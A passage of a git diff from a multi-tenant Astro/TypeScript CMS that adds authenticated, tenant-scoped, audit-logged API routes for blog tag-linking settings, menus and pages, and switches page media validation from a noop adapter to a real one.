+    return ok({ ...ad, placements });
+  });
+};

--- a/src/pages/api/v1/blog/internal-tag-links/settings.ts
+++ b/src/pages/api/v1/blog/internal-tag-links/settings.ts
@@ -1,0 +1,194 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import { resolveBlogAutoInternalTagLinksConfig } from "../../../../../modules/blog-content/domain/internal-tag-linking-config";
+import { validateUpdateInternalTagLinkingSettingsInput } from "../../../../../modules/blog-content/domain/internal-tag-linking-policy";
+import {
+  countExistingTagTermIds,
+  fetchInternalTagLinkingSettings,
+  upsertInternalTagLinkingSettings
+} from "../../../../../modules/blog-content/application/internal-tag-link-settings-directory";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "internal_links",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "internal_links",
+  action: "configure" as const
+};
+
+/**
+ * `GET /api/v1/blog/internal-tag-links/settings` (Issue #641) — effective
+ * automatic internal tag linking configuration for this tenant: the
+ * deployment-wide `BLOG_AUTO_INTERNAL_TAG_LINKS_*` knobs (read-only from
+ * this endpoint's perspective) plus the tenant's own overridable policy
+ * (`enabled`, `caseInsensitive`, `disabledTagIds`). Deliberately a
+ * dedicated endpoint/permission, NOT folded into `GET /api/v1/blog/settings`
+ * — see migration 050's header for why.
+ */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const deploymentConfig = resolveBlogAutoInternalTagLinksConfig();
+    const tenantSettings = await fetchInternalTagLinkingSettings(tx, tenantId);
+
+    return ok({
+      enabled: deploymentConfig.enabled && tenantSettings.enabled,
+      deploymentEnabled: deploymentConfig.enabled,
+      tenantEnabled: tenantSettings.enabled,
+      caseInsensitive: tenantSettings.caseInsensitive,
+      disabledTagIds: tenantSettings.disabledTagIds,
+      maxPerPost: deploymentConfig.maxPerPost,
+      maxPerTag: deploymentConfig.maxPerTag,
+      minTermLength: deploymentConfig.minTermLength,
+      linkFirstOccurrenceOnly: deploymentConfig.linkFirstOccurrenceOnly,
+      excludeHeadings: deploymentConfig.excludeHeadings,
+      updatedAt: tenantSettings.updatedAt
+    });
+  });
+};
+
+/**
+ * `PATCH /api/v1/blog/internal-tag-links/settings` (Issue #641) — partial
+ * update of the tenant-overridable policy only (`enabled`/
+ * `caseInsensitive`/`disabledTagIds`). The six deployment-wide
+ * `BLOG_AUTO_INTERNAL_TAG_LINKS_*` knobs are environment-only, never
+ * writable through this or any endpoint. `disabledTagIds` is verified to
+ * reference real, same-tenant, non-deleted, `taxonomy_type = 'tag'` terms
+ * before being accepted (cross-tenant/nonexistent/category ids rejected
+ * with a 400, never a raw constraint error).
+ */
+export const PATCH: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateInternalTagLinkingSettingsInput(
+    bodyRead.value
+  );
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Internal tag linking settings are invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    if (input.disabledTagIds && input.disabledTagIds.length > 0) {
+      const existingCount = await countExistingTagTermIds(
+        tx,
+        tenantId,
+        input.disabledTagIds
+      );
+
+      if (existingCount !== input.disabledTagIds.length) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "disabledTagIds contains an id that is not an existing tag for this tenant."
+        );
+      }
+    }
+
+    const settings = await upsertInternalTagLinkingSettings(
+      tx,
+      tenantId,
+      input
+    );
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.internal_tag_linking.settings_updated",
+      resourceType: "blog_internal_tag_link_settings",
+      severity: "info",
+      message: "Automatic internal tag linking settings updated.",
+      correlationId
+    });
+
+    log("info", "blog-content.internal-tag-linking-policy.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content"
+    });
+
+    return ok(settings);
+  });
+};

--- a/src/pages/api/v1/blog/menus/[id].ts
+++ b/src/pages/api/v1/blog/menus/[id].ts
@@ -1,0 +1,229 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchMenuById,
+  fetchMenuItems,
+  softDeleteMenu,
+  syncMenuItems,
+  updateMenu
+} from "../../../../../modules/blog-content/application/menu-directory";
+import { validateDeleteReasonInput } from "../../../../../modules/blog-content/domain/content-validation";
+import {
+  validateMenuItemsInput,
+  type MenuItemInput
+} from "../../../../../modules/blog-content/domain/menu-policy";
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "menus",
+  action: "configure" as const
+};
+
+/** `PATCH /api/v1/blog/menus/{id}` (Issue #542). `name` and/or `items` (full replace) may be sent independently. */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Menu id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const record = body ?? {};
+
+  if (
+    record.name !== undefined &&
+    (typeof record.name !== "string" || record.name.trim().length === 0)
+  ) {
+    return fail(400, "VALIDATION_ERROR", "name must be a non-empty string.");
+  }
+
+  let items: MenuItemInput[] | undefined;
+
+  if (record.items !== undefined) {
+    const itemsResult = validateMenuItemsInput(record.items);
+
+    if (!itemsResult.valid) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "Menu items are invalid.",
+        {},
+        itemsResult.errors
+      );
+    }
+
+    items = itemsResult.value;
+  }
+
+  const name = typeof record.name === "string" ? record.name.trim() : undefined;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const updated = await updateMenu(tx, tenantId, id, name);
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Menu not found.");
+    }
+
+    const currentItems = items
+      ? await syncMenuItems(tx, tenantId, id, items)
+      : await fetchMenuItems(tx, tenantId, id);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.menu.updated",
+      resourceType: "blog_menu",
+      resourceId: id,
+      severity: "info",
+      message: `Blog menu updated: ${updated.key}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.menu.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      menuId: id,
+      key: updated.key
+    });
+
+    return ok({ ...updated, items: currentItems });
+  });
+};
+
+/** `DELETE /api/v1/blog/menus/{id}` (Issue #542) — soft-delete. `reason` required, same convention as posts/pages/terms/templates. Menu items stay in place (no FK to worry about — RLS scopes them, and a soft-deleted menu's items are simply unreachable through the menu list). */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Menu id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateDeleteReasonInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchMenuById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Menu not found.");
+    }
+
+    await softDeleteMenu(tx, tenantId, auth.context.tenantUserId, id, reason);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.menu.deleted",
+      resourceType: "blog_menu",
+      resourceId: id,
+      severity: "warning",
+      message: "Blog menu deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    log("info", "blog-content.menu.deleted", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      menuId: id
+    });
+
+    return ok({ id, deleted: true });
+  });
+};

--- a/src/pages/api/v1/blog/menus/index.ts
+++ b/src/pages/api/v1/blog/menus/index.ts
@@ -1,0 +1,201 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createMenu,
+  fetchMenuItems,
+  listMenus,
+  syncMenuItems
+} from "../../../../../modules/blog-content/application/menu-directory";
+import { validateMenuItemsInput } from "../../../../../modules/blog-content/domain/menu-policy";
+import { isValidSlug } from "../../../../../modules/blog-content/domain/slug-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "menus",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "menus",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/blog/menus` (Issue #542) — list this tenant's non-deleted menus (without items; fetch `GET .../menus/{id}` equivalent via items endpoint is folded into list for now, see doc below). */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const menus = await listMenus(tx, tenantId);
+
+    // Sequential loop, NOT `Promise.all(menus.map(async …))` — every iteration
+    // issues a query on the SAME transaction/connection (`tx`), and one Postgres
+    // connection serves one query at a time; running them concurrently produced
+    // a real hang in this repo (see
+    // `reporting/application/projection-reconciliation.ts:89-94`). This fan-out
+    // was also UNBOUNDED — one concurrent query per menu the tenant has.
+    const withItems: Array<
+      (typeof menus)[number] & {
+        items: Awaited<ReturnType<typeof fetchMenuItems>>;
+      }
+    > = [];
+
+    for (const menu of menus) {
+      withItems.push({
+        ...menu,
+        items: await fetchMenuItems(tx, tenantId, menu.id)
+      });
+    }
+
+    return ok({ menus: withItems });
+  });
+};
+
+/** `POST /api/v1/blog/menus` (Issue #542) — create a menu, optionally with its initial `items` tree. Not idempotent — a retry duplicating a create is caught by the `(tenant_id, key)` partial unique index. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const record = body ?? {};
+
+  if (
+    typeof record.key !== "string" ||
+    !isValidSlug(record.key.trim()) ||
+    typeof record.name !== "string" ||
+    record.name.trim().length === 0
+  ) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "key (slug format) and name are required."
+    );
+  }
+
+  const itemsInput = record.items ?? [];
+  const itemsResult = validateMenuItemsInput(itemsInput);
+
+  if (!itemsResult.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Menu items are invalid.",
+      {},
+      itemsResult.errors
+    );
+  }
+
+  const key = record.key.trim();
+  const name = record.name.trim();
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    let menu;
+
+    try {
+      menu = await createMenu(tx, tenantId, key, name);
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_menus_key_dedup")) {
+        return fail(
+          409,
+          "KEY_CONFLICT",
+          `A menu already exists for key "${key}".`
+        );
+      }
+
+      throw error;
+    }
+
+    const items = await syncMenuItems(tx, tenantId, menu.id, itemsResult.value);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.menu.created",
+      resourceType: "blog_menu",
+      resourceId: menu.id,
+      severity: "info",
+      message: `Blog menu created: ${menu.key}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.menu.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      menuId: menu.id,
+      key: menu.key
+    });
+
+    return ok({ ...menu, items });
+  });
+};

--- a/src/pages/api/v1/blog/pages/[id].ts
+++ b/src/pages/api/v1/blog/pages/[id].ts
@@ -1,0 +1,429 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import {
+  fetchGrantedPermissionKeys,
+  resolveModuleEnabled,
+  resolveTenantContext
+} from "../../../../../modules/identity-access/application/auth-context";
+import { recordDecisionLog } from "../../../../../modules/identity-access/application/decision-log";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchBlogPageById,
+  softDeleteBlogPage,
+  updateBlogPage
+} from "../../../../../modules/blog-content/application/blog-page-directory";
+import { createBlogRevision } from "../../../../../modules/blog-content/application/blog-revision-directory";
+import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
+import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
+import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import {
+  validateSoftDeleteBlogPageInput,
+  validateUpdateBlogPageInput
+} from "../../../../../modules/blog-content/domain/blog-page-validation";
+import { validateAndNormalizeContentJsonVideoBlocks } from "../../../../../modules/blog-content/domain/video-news-block-validation";
+import { evaluatePageUpdateAccess } from "../../../../../modules/blog-content/domain/page-access-policy";
+import { isSignificantContentChange } from "../../../../../modules/blog-content/domain/revision-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "pages",
+  action: "read" as const
+};
+
+const UPDATE_ACTIVITY = { moduleKey: "blog_content", activityCode: "pages" };
+
+const DELETE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "pages",
+  action: "delete" as const
+};
+
+/** `GET /api/v1/blog/pages/{id}` (Issue #539). */
+export const GET: APIRoute = async ({ request, params, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const pageId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!pageId) {
+    return fail(400, "VALIDATION_ERROR", "Page id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const page = await fetchBlogPageById(tx, tenantId, pageId);
+
+    if (!page) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog page not found.");
+    }
+
+    return ok(page);
+  });
+};
+
+/**
+ * `PATCH /api/v1/blog/pages/{id}` (Issue #539). Access decided by
+ * `evaluatePageUpdateAccess` — same author-own-unpublished-content
+ * override `PATCH /api/v1/blog/posts/{id}` uses, fixed to
+ * `blog_content.pages.update` (doc issue #539: "must follow the same
+ * auth, tenant, RBAC/ABAC, ... patterns introduced in the blog post
+ * API").
+ */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const pageId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!pageId) {
+    return fail(400, "VALIDATION_ERROR", "Page id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request, "large");
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateBlogPageInput(bodyRead.value, pageId);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog page update is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+
+  // Issue #639 — see `POST /api/v1/blog/pages`'s identical comment. Only
+  // runs when `contentJson` is actually present in this partial update.
+  if (input.contentJson !== undefined) {
+    const videoBlockValidation = validateAndNormalizeContentJsonVideoBlocks(
+      input.contentJson
+    );
+
+    if (!videoBlockValidation.valid) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "Blog page update is invalid.",
+        {},
+        videoBlockValidation.errors
+      );
+    }
+
+    input.contentJson = videoBlockValidation.value;
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const context = await resolveTenantContext(tx, tenantId, tokenHash, now);
+
+    if (!context) {
+      return fail(401, "AUTH_REQUIRED", "Session is invalid or expired.");
+    }
+
+    const moduleEnabled = await resolveModuleEnabled(
+      tx,
+      tenantId,
+      "blog_content"
+    );
+
+    if (!moduleEnabled) {
+      return fail(
+        403,
+        "MODULE_DISABLED",
+        "Module is disabled for this tenant."
+      );
+    }
+
+    const page = await fetchBlogPageById(tx, tenantId, pageId);
+
+    if (!page) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog page not found.");
+    }
+
+    const grantedPermissionKeys = await fetchGrantedPermissionKeys(
+      tx,
+      tenantId,
+      context.tenantUserId
+    );
+    const decision = evaluatePageUpdateAccess(context, grantedPermissionKeys, {
+      authorTenantUserId: page.authorTenantUserId,
+      status: page.status
+    });
+
+    await recordDecisionLog(
+      tx,
+      tenantId,
+      context.tenantUserId,
+      {
+        ...UPDATE_ACTIVITY,
+        action: "update",
+        resourceType: "blog_page",
+        resourceId: pageId
+      },
+      decision
+    );
+
+    if (!decision.allowed) {
+      return fail(403, "ACCESS_DENIED", decision.reason);
+    }
+
+    if (input.parentPageId) {
+      if (input.parentPageId === pageId) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "A page cannot be its own parent."
+        );
+      }
+
+      const parentRows = await tx`
+        SELECT id FROM awcms_blog_pages
+        WHERE tenant_id = ${tenantId} AND id = ${input.parentPageId} AND deleted_at IS NULL
+      `;
+
+      if (parentRows.length === 0) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "parentPageId does not reference an existing page."
+        );
+      }
+    }
+
+    const mediaReferenceValidation =
+      await validateNewsMediaReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        {
+          featuredMediaId: input.featuredMediaId,
+          contentJson: input.contentJson
+        },
+        noopNewsMediaPortAdapter
+      );
+
+    if (!mediaReferenceValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more image references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        mediaReferenceValidation.errors
+      );
+    }
+
+    // Issue #639 — see `POST /api/v1/blog/pages`'s identical comment.
+    const videoThumbnailValidation =
+      await validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+        tx,
+        tenantId,
+        input.contentJson,
+        noopNewsMediaPortAdapter
+      );
+
+    if (!videoThumbnailValidation.valid) {
+      return fail(
+        422,
+        "NEWS_MEDIA_REFERENCE_INVALID",
+        "One or more video thumbnail references are not valid R2 media objects in full-online R2-only mode.",
+        {},
+        videoThumbnailValidation.errors
+      );
+    }
+
+    let updated;
+
+    try {
+      updated = await updateBlogPage(tx, tenantId, pageId, input);
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_pages_slug_dedup")) {
+        return fail(
+          409,
+          "SLUG_CONFLICT",
+          `A page already exists for slug "${input.slug}" in this locale.`
+        );
+      }
+
+      throw error;
+    }
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog page not found.");
+    }
+
+    if (isSignificantContentChange(input)) {
+      await createBlogRevision(
+        tx,
+        tenantId,
+        "page",
+        pageId,
+        context.tenantUserId,
+        {
+          title: updated.title,
+          contentJson: updated.contentJson,
+          contentText: updated.contentText,
+          excerpt: updated.excerpt,
+          seoTitle: updated.seoTitle,
+          metaDescription: updated.metaDescription,
+          canonicalUrl: updated.canonicalUrl,
+          status: updated.status
+        },
+        null,
+        correlationId
+      );
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.page.updated",
+      resourceType: "blog_page",
+      resourceId: pageId,
+      severity: "info",
+      message: `Blog page updated: ${updated.slug}.`,
+      correlationId
+    });
+
+    return ok(updated);
+  });
+};
+
+/** `DELETE /api/v1/blog/pages/{id}` (Issue #539) — soft-delete. `reason` required, same convention as posts. */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const pageId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!pageId) {
+    return fail(400, "VALIDATION_ERROR", "Page id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateSoftDeleteBlogPageInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      DELETE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const deleted = await softDeleteBlogPage(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      pageId,
+      reason
+    );
+
+    if (!deleted) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog page not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.page.deleted",
+      resourceType: "blog_page",
+      resourceId: pageId,
+      severity: "warning",
+      message: "Blog page deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    return ok({ id: pageId, deleted: true });
+  });
+};

--- a/src/pages/api/v1/blog/pages/[id].ts
+++ b/src/pages/api/v1/blog/pages/[id].ts
@@ -27,7 +27,7 @@ import {
 import { createBlogRevision } from "../../../../../modules/blog-content/application/blog-revision-directory";
 import { validateNewsMediaReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/news-media-reference-gate";
 import { validateVideoNewsThumbnailReferencesForFullOnlineR2Mode } from "../../../../../modules/blog-content/application/video-news-thumbnail-reference-gate";
-import { noopNewsMediaPortAdapter } from "../../../../../modules/blog-content/application/news-media-port-noop-adapter";
+import { newsMediaPortAdapter } from "../../../../../modules/news-portal/application/news-media-port-adapter";
 import {
   validateSoftDeleteBlogPageInput,
   validateUpdateBlogPageInput
@@ -248,7 +248,7 @@ export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
           featuredMediaId: input.featuredMediaId,
           contentJson: input.contentJson
         },
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!mediaReferenceValidation.valid) {
@@ -267,7 +267,7 @@ export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
         tx,
         tenantId,
         input.contentJson,
-        noopNewsMediaPortAdapter
+        newsMediaPortAdapter
       );
 
     if (!videoThumbnailValidation.valid) {

--- a/src/pages/api/v1/blog/pages/[id]/quality-checklist.ts
+++ b/src/pages/api/v1/blog/pages/[id]/quality-checklist.ts
@@ -1,0 +1,97 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../../lib/database/client";
+import { withTenant } from "../../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../../lib/auth/session-token";
+import { fetchBlogPageById } from "../../../../../../modules/blog-content/application/blog-page-directory";
+import { fetchBlogSettings } from "../../../../../../modules/blog-content/application/blog-settings-directory";
+import { evaluateContentQualityChecklistForContent } from "../../../../../../modules/blog-content/application/content-quality-checklist-gate";
